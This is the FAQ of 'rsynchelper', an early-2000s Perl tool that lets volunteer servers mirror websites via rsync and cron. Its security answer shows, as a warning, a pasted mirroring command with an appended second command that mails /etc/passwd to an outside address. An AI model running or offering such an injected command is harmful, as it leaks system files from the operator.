Here is the FAQ (also in the sourcecode)
rsynchelper README Version: $Id: FAQ,v 1.1 2001/02/27 09:10:28 saralin Exp $ Copyright Sara Lin
Released under GPL - see LICENCE 1. Questions for people thinking about installing rsynchelper 2. Details on mirroring a site from another server 3. Details on asking servers in your buddylist to mirror a site on your server ------------------------------------------------------------------- 1. Questions for people thinking about installing rsynchelper 1.1) What is mirroring? Why mirror? 1.2) rsynchelper in non-technical language. 1.3) What are the pre-requisites for using rsynchelper? 1.4) rsynchelper in technical language. 1.5) Is it a lot of work to be a mirror? What are the downsides? 1.6) Sounds good -- how do I become a mirror? What is the install process? 1.7) Joining or setting up a buddylist ------------------------------------------------------------------- 2. Details on mirroring a site from another server 2.1) I've gotten a request to mirror a site -- what do I do? 2.2) I don't want to choose what I mirror on a site-by-site basis. Can I setup broader mirroring to servers I trust? 2.6) I'm having problems mirroring -- what should I do? 2.7) I run NT, can I participate? 2.8) I can view my own rsync server modules, but other people can't view mine, or I can't view other people's. Is there a firewall issue? 2.9) I have an existing /etc/rsyncd.conf - can I safely install this program? 2.10) Is rsynchelper secure? Are there any security issues? 2.11) Why doesn't rsynchelper use ssh? 2.12) I think I've mirrored a site, but how can I tell? 2.13) Do I have to be in a certain directory to run rsynchelper? Do I run it as a certain user? ------------------------------------------------------------------- 3. Details on asking servers in your buddylist to mirror a site on your server 3.1) How do I get other hosts to mirror a site? 3.2) How does a member of the public get to the mirrored site? What is the mirrored site's new URL? 3.3) I want servers to stop mirroring my site, what do I do? 3.4) How do I convert non-mirrorable absolute links to relative links? 3.5) How do I know that other host successfully mirrored from me? Where is a log of who has mirrored my site? ========================================================================== ---- Answers ========================================================================== 1.1) What is mirroring? Why mirror? A simple definition of mirroring: "When one server makes an exact copy of the content on another server." Why mirror? These are a few possible motives: a) make a closer copy of the content to make downloads faster b) join the bandwidth capacity of several servers to cope with popular sites c) demonstrate support for the content d) defend against suppression of the content Popular open-source software projects are the group that uses mirrors the most often. Controversial web sites on human rights / corporate whistle-blowers also use mirroring. rsynchelper is only a generic tool -- you are responsible for your own choices of what content to mirror. 1.2) rsynchelper in non-technical language. rsynchelper is designed to make it easy for a loose group of mirrors to quickly and easily setup mirroring time and time again. rsynchelper makes it easier to use mirroring. rsynchelper: a) makes it easier to make your content available for others to mirror b) makes it easier to mirror someone else's content c) automates maintaining an accurate list of who is maintaining which content It takes about 5-10 minutes to setup rsynchelper the first time. Each time a server in a buddy network gets a request to mirror a site, they can setup the mirroring simply by cutting and pasting a single command (less than a minute). Each member of the mirror network chooses whether or not to mirror each site. There is an automatically generated and often widely distributed list of which sites are mirroring each site. 1.3) What are the pre-requisites for using rsynchelper? rsynchelper helps linux/unix computers use the mirroring program rsync. rsync can be found at http://rsync.samba.org/ -- it is the state of the art for efficiently syncronizing files between servers. To use rsynchelper to mirror others you only need perl and rsync. To make your information available to others, you need root access and must NOT have the rsync port blocked by a firewall. 1.4) rsynchelper in technical language. A server (host X) asks others on the mirrorlist: "Please mirror the site called 'site1' from me." A server Y chooses to mirror the site and runs the command: rsynchelper hostX::mirror_me/site1 /hostX/ This copies files from host X to host Y and puts them in a directory on host Y. To get to the site, the general public will then go to http://hostY/mirrors/hostX/site1 For more on how this works, read Section 2 of this FAQ. To review what a single server needs to participate in a mirror network: a) To be able to mirror others, you use the program 'rsync'. b) To setup regular mirroring, you use run rsync via cron. c) To have other servers mirror you, you need to run the rsync server 'rsyncd', and edit /etc/rsyncd.conf rsynchelper has two pieces -- an installer and script : a) the installer configures your computer to be an rsync server, ie it edits, when needed, /etc/rsyncd.conf /etc/services /etc/inetd.conf By default, it links the rsync module 'mirrors' to a directory available to your webserver. b) the perl script rsynchelper simplifies common mirroring tasks via rsync and cron. It helps beginning unix administrators to easily act as mirrors. There is another script, 'mirrorlist', that plays a supportive role. Not every server running rsynchelper needs to run mirrorlist. mirrorlist: c) polls a list of servers and creates an up-to-date list of which servers are mirroring each site on the list. 1.5) Is it a lot of work to be a mirror? What are the downsides? To INSTALL: After skimming this document, it will take less than 5 minutes to install rsynchelper. If you need to install rsync, that will also only take a few minutes. If you need to open up your firewall to allow access to rsyncd, this will take additional time, depending on local setup and skill. TO MAINTAIN: When a site comes up for protection, and you want to mirror that site, it will only take cutting and pasting one command from an email message to start mirroring the site. SYSTEM USAGE: The first time you mirror a site, you download the whole site. Each night, your cronjob downloads only the changes, often less than 1% of the size of the whole site. Some people will web-browse your mirror. Most visitors will go to the mirrors they perceive as being high-bandwidth/fast sites, so visitors will probably not consume too much bandwidth. TIME: It takes some time to monitor a buddylist listserve, and decide whether you want to mirror a site. Some content may not be appropriate for your server. Most buddylists listserv's have very low traffic. 1.6) Sounds good -- how do I become a mirror? What is the install process? To install: a) get latest version of sourcecode from http://sourceforge.net/files/project=xxxx b) install rsynchelper gunzip -c rsynchelper-x.tar.gz | tar xzf -- cd rsynchelper && perl install.pl # this will be perl5 install.pl c) possibly open up your firewall You may need to open up your firewall to allow other people to mirror sites from you via rsync. If you have a firewall, see FAQ 2.8 d) join or setup a buddylist see FAQ 1.7 1.7) Joining or setting up a buddylist rsynchelper is designed to make it easy for a group of servers (a buddylist) to often join together in mirroring a site. There are two buddylist aspects to mirroring: * Getting on a mailinglist where new requests for mirroring are posted * Having your server be automatically 'polled' to see what sites are being mirrored. To join a buddylist, you a) install rsynchelper b) join a mailinglist for a buddylist c) send your configuration to the mirrorlist servers, who will poll you To setup a new buddylist you a) install rsynchelper on several servers b) install mirrorlist on one or more servers c) create a mailinglist for people to join d) ask others to join your buddylist by publicizing the email address for the maintainers of b) and c) If you run a server at a university, business, or as an individual, you probably want to join an existing buddylist. Each buddylist is independent, so you need to find the homepage of the buddylist(s) that you are interested in. Generally people reading this document will do so from a buddylist homepage. Some buddylist homepages are listed: http://rsynchelper.sourceforge.net/external_links/ If you are are an association of servers, or are concerned with a particular type of content not served by existing buddylists, you may want to setup your own buddylist. After it is up and running, you may want to add your list to: http://rsynchelper.sourceforge.net/external_links/ -------------------------------------------------------------------- 2.1) I've gotten a request to mirror a site -- what do I do? If you join a buddylist listserve, you will get requests from servers to mirror their sites. If you choose to mirror the site, cut and paste the rsynchelper command they suggest. They will probably suggest you run a command like: rsynchelper -c server.org::mirror_me/test1 /server.org/ The -c option will semi-automatically setup ongoing mirroring (by putting the rsynchelper command in cron). You may want to manually edit your crontab, in which case, do not use -c , but use -v to see the suggested entry to the crontab, like rsynchelper -v server.org::mirror_me/test1 /server.org/ The crontab entry will look something like this: 0 1 * * * rsynchelper server.org::mirror_me/test1 /server.org/ This will be in the crontab of the user who owns the mirror_me directory. This user is usually 'nobody', but you pick this user when you run install.pl 2.2) I don't want to choose what I mirror on a site-by-site basis. Can I setup broader mirroring to servers I trust? Yes. You have two options for 'trust' based automation. A) To mirror all sites, for example, that server.org ASKS you to mirror, do: rsynchelper server.org::mirror_me/* /server.org/ B) You can also play 'follow the leader', and mirror the same sites that another server mirrors. For example, to mirror everything that server.org mirrors from other people, do: rsynchelper server.org::mirrors/* / 2.6) I'm having problems mirroring -- what should I do? Contact your buddylist listserv or technical contact for help. If you are a buddylist technical contact, you should join firstname.lastname@example.org where you can give and receive advice. You may also want to read-up on rsync, as the mirror system is build on that. Read the 'man rsync' 'man rsyncd.conf' The rsync homepage has a number of good tutorials, including http://www.eunuchs.org/linux/rsync/ 2.7) I run NT, can I participate? Not yet. rsynchelper would need to be ported to NT. rsync runs fine on NT. You can participate if you want to convert rsynchelper.pl to NT. rsynchelper is a perl script, which can work on NT. -- however, the paths to $mirrors and $rsync_bin would have to edited, and the cron stuff dealt with. The install.pl program will not work, as it relies too much on a UNIX environment. 2.8) I can view my own rsync server modules, but other people can't view mine, or I can't view other people's. Is there a firewall issue? There is probably a firewall issue. For your rsync server to be visbile, port 873 needs to be open. To reconfigure your firewall, you should know what you are doing! On a cisco system, you would add something like this line (replacing 192...) access-list 101 permit tcp any host 192.168.1.33 eq 873 On a computer that uses IPCHAINS, If the default input policy to your host is DENY, you may open the port with: ipchains -I input -d 192.168.1.33 873 -p tcp -j ACCEPT (replace the IP number above with your host's IP) 2.9) I have an existing /etc/rsyncd.conf - can I safely install this program? Yes. Keep a backup copy of /etc/rsyncd.conf , and then run install.pl Then look at /etc/rsyncd.conf Do the modules look OK? 2.10) Is rsynchelper secure? The most obvious danger with rsynchelper is that people often use it in conjunction with a mailinglist -- they get requests from the mailinglist to mirror a site and cut and paste the rsynchelper command onto the command line. Whenever you run a command, you should look carefully at the command. It is fine if the command looks like: rsynchelper -c server.org::mirrors/site1 /server.org/ But don't run it if it looks like: rsynchelper -c s.org::mirrors/1 /s/ ; Mail -s1 email@example.com < /etc/passwd Also, look at the second argument -- is it normal, or does it contain special characters? Don't run the command if you are suspicious. Basically, the current use of rsync by rsynchelper is as secure as rsync is. It is secure unless there are undiscovered buffer overflows, etc... 2.11) Why doesn't rsynchelper use ssh? Summary of the issue: rsh is badly broken, and often opens up security holes. ssh is a drop in replacement for rsh, which is both more secure AND encrypts traffic. rsynchelper uses rsync in a the special rsync-server mode. This mode does not use use either ssh or rsh. This mode is not vulnerable to the same problems as rsh. However, this mode does not encrypt traffic. Luckily, in our case, the traffic is publically available webpages. We don't run rsync over ssh because then servers would need accounts on each other (for ssh logins). Most big mirror networks use the special rsync server mode that we use. 2.12) I think I've mirrored a site, but how can I tell? The simplest thing is to run rsynchelper with the -v option the first time you mirror the site. It will show you the files it is copying. With or without the -v option, rsynchelper should tell you if it runs into trouble. You can also just look in the filing system and see whether or not the new site has been mirrored to your server. If you ran the command rsynchelper server.org::mirrors/site1 /server.org/ Then, there should be a directory full of files at: $mirrors/server.org/site1 2.13) Do I have to be in a certain directory to run rsynchelper? Do I run it as a certain user? You do NOT have to be inside the correct directory before running rsynchelper . One of the jobs of rsynchelper is to setup to correct environment to rsync. You can run rsynchelper as either root or the correct user. If it is run as root it will switch to the user specified in /etc/rsynchelper.conf -------------------------------------------------------------------- Publishing Threatened Sites 3.1) How do I get other hosts to mirror a site? Put mirror-able files in a subdirectory of your mirror_me directory. HTML files will need to use relative links, or they won't mirror well. If your HTML files use absolute links, see FAQ 3.4 Email the mailinglist to let people know you want mirrors. Tell people the commands to run to mirror your site. -start of email- Please run this command to immediately mirror us: rsynchelper -c rsync://my.server.org/sitename /my.server.org/ This site is about xxx, and is size xxx. -end of email- If you are concerned about authentication, PGP sign you message and say where people can go to get your public key. 3.2) How does a member of the public get the mirrored site? What is the mirrored site's new URL? Once a site has been mirrored, the public still needs to view an 'index' page that lists where the mirrors are. Some 'indexing servers' poll all the servers in a buddylist and assemble a list of who is mirroring what. 3.3) How do I get servers to stop mirroring my site? Email your buddylist and ask people to run, for example, rsynchelper -R rsync://my.server.org/sitename /my.server.org/ Some people may require that you PGP sign your 'stop' request to prevent vandals from forging a stop request. 3.4) How do I convert non-mirrorable absolute links to relative links? You can use w3mir or wget. The wget manual explains how to do this under Directory. http://www.gnu.org/manual/wget/index.html Here is summary: #create the directory where you will put the files like: mkdir /tmp/local_links cd /tmp/local_links wget -r -k -nH http://some.virtual.com/ # or, if the original site is already in a subdirectory wget -r -k -nH --cut-dirs=1 http://some.host.com/somedir/index.html 3.5 How do I know that other host successfully mirrored from me? Where is a log of who has mirrored my site? By default, rsyncd logs to the syslog daemon, which in turn logs different types of messages to different log files. On my laptop, this means that I get informational messages about rsync transfers in /var/log/messages , but the exact logfile will depend on your /etc/syslog.conf You can also specify a log file directly in /etc/rsyncd.conf. Read 'man rsyncd.conf' for how to customize logging. 'man syslog.conf' may be helpful if you are trying to understand syslog for the first time.